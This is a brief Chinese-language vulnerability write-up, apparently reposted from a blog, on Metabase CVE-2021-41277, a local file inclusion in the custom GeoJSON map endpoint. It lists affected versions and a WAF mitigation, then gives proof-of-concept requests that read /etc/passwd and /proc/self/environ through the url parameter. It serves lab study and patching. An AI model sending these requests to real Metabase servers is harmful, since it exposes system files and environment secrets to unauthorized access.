标签：Metabase file Vulfocus 41277 geojson 漏洞 maps 版本 0.40

漏洞描述

etabase 是一个开源数据分析平台。在受影响的版本中，已发现自定义 GeoJSON 地图（admin->settings->maps->custom maps->add a map）支持和潜在的本地文件包含（包括环境变量）存在安全问题。URL 在加载之前未经过验证。此问题已在新的维护版本（0.40.5 和 1.40.5）以及之后的任何后续版本中得到修复。如果您无法立即升级，您可以通过在反向代理或负载均衡器或 WAF 中包含规则以在应用程序之前提供验证过滤器来缓解这种情况。

影响版本

metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5

漏洞复现

poc：/api/geojson?url=file:/etc/passwd

flag：

/api/geojson?url=file:///proc/self/environ

标签：Metabase,file,Vulfocus,41277,geojson,漏洞,maps,版本,0.40
来源： https://www.cnblogs.com/mlxwl/p/16608967.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。